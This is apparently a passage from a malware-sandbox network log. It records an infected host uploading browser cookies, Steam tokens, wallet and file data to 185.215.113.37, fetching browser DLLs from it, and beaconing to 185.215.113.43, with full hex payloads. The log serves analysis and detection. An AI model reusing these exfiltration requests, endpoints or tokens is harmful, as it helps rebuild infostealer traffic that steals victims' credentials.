62 46 56 43 57 55 70 46 61 48 56 48 63 31 46 6b 63 57 35 70 4d 32 39 55 53 6d 63 77 59 6e 4a 78 64 6a 46 6b 61 6d 52 70 54 45 70 35 64 6c 52 54 56 57 68 6b 53 79 31 6a 4e 55 70 58 59 57 52 44 55 33 4e 56 54 46 42 4d 65 6d 68 54 65 43 31 47 4c 54 5a 33 54 32 63 30 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 49 45 2d 2d 0d 0a Data Ascii: ------JJECFIECBGDGCAAAEHIEContent-Disposition: form-data; name="token"bd2ccbbe98cca1eab7ee8006d6f5505c8f5e9b60fecb834387520d2908094d028f0666ff------JJECFIECBGDGCAAAEHIEContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------JJECFIECBGDGCAAAEHIEContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwMTE2MTUJMVBfSkFSCTIwMjMtMTAtMDQtMTMKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjMwODE1CU5JRAk1MTE9RWY1dlBGR3ctTVpZbzVod2UtMFRoQVZzbGJ4Y
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFCAAEGDBKJJKECBKFHCHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 43 41 41 45 47 44 42 4b 4a 4a 4b 45 43 42 4b 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 64 32 63 63 62 62 65 39 38 63 63 61 31 65 61 62 37 65 65 38 30 30 36 64 36 66 35 35 30 35 63 38 66 35 65 39 62 36 30 66 65 63 62 38 33 34 33 38 37 35 32 30 64 32 39 30 38 30 39 34 64 30 32 38 66 30 36 36 36 66 66 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 41 41 45 47 44 42 4b 4a 4a 4b 45 43 42 4b 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 41 41 45 47 44 42 4b 4a 4a 4b 45 43 42 4b 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 41 41 45 47 44 42 4b 4a 4a 4b 45 43 42 4b 46 48 43 2d 2d 0d 0a Data Ascii: ------AFCAAEGDBKJJKECBKFHCContent-Disposition: form-data; name="token"bd2ccbbe98cca1eab7ee8006d6f5505c8f5e9b60fecb834387520d2908094d028f0666ff------AFCAAEGDBKJJKECBKFHCContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------AFCAAEGDBKJJKECBKFHCContent-Disposition: form-data; name="file"------AFCAAEGDBKJJKECBKFHC--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFIDAFBFBKFHJJKEHIEGHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 49 44 41 46 42 46 42 4b 46 48 4a 4a 4b 45 48 49 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 64 32 63 63 62 62 65 39 38 63 63 61 31 65 61 62 37 65 65 38 30 30 36 64 36 66 35 35 30 35 63 38 66 35 65 39 62 36 30 66 65 63 62 38 33 34 33 38 37 35 32 30 64 32 39 30 38 30 39 34 64 30 32 38 66 30 36 36 36 66 66 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 44 41 46 42 46 42 4b 46 48 4a 4a 4b 45 48 49 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 44 41 46 42 46 42 4b 46 48 4a 4a 4b 45 48 49 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 44 41 46 42 46 42 4b 46 48 4a 4a 4b 45 48 49 45 47 2d 2d 0d 0a Data Ascii: ------KFIDAFBFBKFHJJKEHIEGContent-Disposition: form-data; name="token"bd2ccbbe98cca1eab7ee8006d6f5505c8f5e9b60fecb834387520d2908094d028f0666ff------KFIDAFBFBKFHJJKEHIEGContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------KFIDAFBFBKFHJJKEHIEGContent-Disposition: form-data; name="file"------KFIDAFBFBKFHJJKEHIEG--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 31 31 33 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1001137001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/freebl3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/mozglue.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 42 32 43 37 38 42 37 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79BB2C78B75C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/msvcp140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/nss3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/softokn3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/vcruntime140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHIIJJJKEGIDGCBAFIJHost: 185.215.113.37Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 42 32 43 37 38 42 37 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79BB2C78B75C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHIJDHCAKKFCBGCBAAECHost: 185.215.113.37Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 49 4a 44 48 43 41 4b 4b 46 43 42 47 43 42 41 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 64 32 63 63 62 62 65 39 38 63 63 61 31 65 61 62 37 65 65 38 30 30 36 64 36 66 35 35 30 35 63 38 66 35 65 39 62 36 30 66 65 63 62 38 33 34 33 38 37 35 32 30 64 32 39 30 38 30 39 34 64 30 32 38 66 30 36 36 36 66 66 0d 0a 2d 2d 2d 2d 2d 2d 45 48 49 4a 44 48 43 41 4b 4b 46 43 42 47 43 42 41 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 45 48 49 4a 44 48 43 41 4b 4b 46 43 42 47 43 42 41 41 45 43 2d 2d 0d 0a Data Ascii: ------EHIJDHCAKKFCBGCBAAECContent-Disposition: form-data; name="token"bd2ccbbe98cca1eab7ee8006d6f5505c8f5e9b60fecb834387520d2908094d028f0666ff------EHIJDHCAKKFCBGCBAAECContent-Disposition: form-data; name="message"wallets------EHIJDHCAKKFCBGCBAAEC--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAECGCGHCGHCAKECBKJKHost: 185.215.113.37Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 45 43 47 43 47 48 43 47 48 43 41 4b 45 43 42 4b 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 64 32 63 63 62 62 65 39 38 63 63 61 31 65 61 62 37 65 65 38 30 30 36 64 36 66 35 35 30 35 63 38 66 35 65 39 62 36 30 66 65 63 62 38 33 34 33 38 37 35 32 30 64 32 39 30 38 30 39 34 64 30 32 38 66 30 36 36 36 66 66 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 43 47 43 47 48 43 47 48 43 41 4b 45 43 42 4b 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 43 47 43 47 48 43 47 48 43 41 4b 45 43 42 4b 4a 4b 2d 2d 0d 0a Data Ascii: ------DAECGCGHCGHCAKECBKJKContent-Disposition: form-data; name="token"bd2ccbbe98cca1eab7ee8006d6f5505c8f5e9b60fecb834387520d2908094d028f0666ff------DAECGCGHCGHCAKECBKJKContent-Disposition: form-data; name="message"files------DAECGCGHCGHCAKECBKJK--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFCFIEHCFIECBGCBFHIJHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 43 46 49 45 48 43 46 49 45 43 42 47 43 42 46 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 64 32 63 63 62 62 65 39 38 63 63 61 31 65 61 62 37 65 65 38 30 30 36 64 36 66 35 35 30 35 63 38 66 35 65 39 62 36 30 66 65 63 62 38 33 34 33 38 37 35 32 30 64 32 39 30 38 30 39 34 64 30 32 38 66 30 36 36 36 66 66 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 46 49 45 48 43 46 49 45 43 42 47 43 42 46 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 46 49 45 48 43 46 49 45 43 42 47 43 42 46 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 46 49 45 48 43 46 49 45 43 42 47 43 42 46 48 49 4a 2d 2d 0d 0a Data Ascii: ------KFCFIEHCFIECBGCBFHIJContent-Disposition: form-data; name="token"bd2ccbbe98cca1eab7ee8006d6f5505c8f5e9b60fecb834387520d2908094d028f0666ff------KFCFIEHCFIECBGCBFHIJContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------KFCFIEHCFIECBGCBFHIJContent-Disposition: form-data; name="file"------KFCFIEHCFIECBGCBFHIJ--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDBKKFHIEGDHJKECAAKKHost: 185.215.113.37Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 64 32 63 63 62 62 65 39 38 63 63 61 31 65 61 62 37 65 65 38 30 30 36 64 36 66 35 35 30 35 63 38 66 35 65 39 62 36 30 66 65 63 62 38 33 34 33 38 37 35 32 30 64 32 39 30 38 30 39 34 64 30 32 38 66 30 36 36 36 66 66 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 2d 2d 0d 0a Data Ascii: ------GDBKKFHIEGDHJKECAAKKContent-Disposition: form-data; name="token"bd2ccbbe98cca1eab7ee8006d6f5505c8f5e9b60fecb834387520d2908094d028f0666ff------GDBKKFHIEGDHJKECAAKKContent-Disposition: form-data; name="message"ybncbhylepme------GDBKKFHIEGDHJKECAAKK--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDHDAEBGCAAFIDGCGDHIHost: 185.215.113.37Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 48 44 41 45 42 47 43 41 41 46 49 44 47 43 47 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 64 32 63 63 62 62 65 39 38 63 63 61 31 65 61 62 37 65 65 38 30 30 36 64 36 66 35 35 30 35 63 38 66 35 65 39 62 36 30 66 65 63 62 38 33 34 33 38 37 35 32 30 64 32 39 30 38 30 39 34 64 30 32 38 66 30 36 36 36 66 66 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 44 41 45 42 47 43 41 41 46 49 44 47 43 47 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 44 41 45 42 47 43 41 41 46 49 44 47 43 47 44 48 49 2d 2d 0d 0a Data Ascii: ------GDHDAEBGCAAFIDGCGDHIContent-Disposition: form-data; name="token"bd2ccbbe98cca1eab7ee8006d6f5505c8f5e9b60fecb834387520d2908094d028f0666ff------GDHDAEBGCAAFIDGCGDHIContent-Disposition: form-data; name="message"wkkjqaiaxkhb------GDHDAEBGCAAFIDGCGDHI--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 42 32 43 37 38 42 37 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79BB2C78B75C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBFBGCGIJKJJKFIDBFCGHost: 185.215.113.37Content-Length: 209Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 42 46 42 47 43 47 49 4a 4b 4a 4a 4b 46 49 44 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 30 46 35 33 39 39 31 35 36 45 41 32 30 33 37 39 30 32 36 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 42 47 43 47 49 4a 4b 4a 4a 4b 46 49 44 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 42 47 43 47 49 4a 4b 4a 4a 4b 46 49 44 42 46 43 47 2d 2d 0d 0a Data Ascii: ------CBFBGCGIJKJJKFIDBFCGContent-Disposition: form-data; name="hwid"20F5399156EA20379026------CBFBGCGIJKJJKFIDBFCGContent-Disposition: form-data; name="build"doma------CBFBGCGIJKJJKFIDBFCG--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 42 32 43 37 38 42 37 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79BB2C78B75C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBFBKKJECAKEHJJJDBAFHost: 185.215.113.37Content-Length: 209Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 46 42 4b 4b 4a 45 43 41 4b 45 48 4a 4a 4a 44 42 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 30 46 35 33 39 39 31 35 36 45 41 32 30 33 37 39 30 32 36 0d 0a 2d 2d 2d 2d 2d 2d 45 42 46 42 4b 4b 4a 45 43 41 4b 45 48 4a 4a 4a 44 42 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 45 42 46 42 4b 4b 4a 45 43 41 4b 45 48 4a 4a 4a 44 42 41 46 2d 2d 0d 0a Data Ascii: ------EBFBKKJECAKEHJJJDBAFContent-Disposition: form-data; name="hwid"20F5399156EA20379026------EBFBKKJECAKEHJJJDBAFContent-Disposition: form-data; name="build"doma------EBFBKKJECAKEHJJJDBAF--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 42 32 43 37 38 42 37 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79BB2C78B75C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBFBKKJECAKEHJJJDBAFHost: 185.215.113.37Content-Length: 209Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 46 42 4b 4b 4a 45 43 41 4b 45 48 4a 4a 4a 44 42 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 30 46 35 33 39 39 31 35 36 45 41 32 30 33 37 39 30 32 36 0d 0a 2d 2d 2d 2d 2d 2d 45 42 46 42 4b 4b 4a 45 43 41 4b 45 48 4a 4a 4a 44 42 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 45 42 46 42 4b 4b 4a 45 43 41 4b 45 48 4a 4a 4a 44 42 41 46 2d 2d 0d 0a Data Ascii: ------EBFBKKJECAKEHJJJDBAFContent-Disposition: form-data; name="hwid"20F5399156EA20379026------EBFBKKJECAKEHJJJDBAFContent-Disposition: form-data; name="build"doma------EBFBKKJECAKEHJJJDBAF--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 42 32 43 37 38 42 37 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79BB2C78B75C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
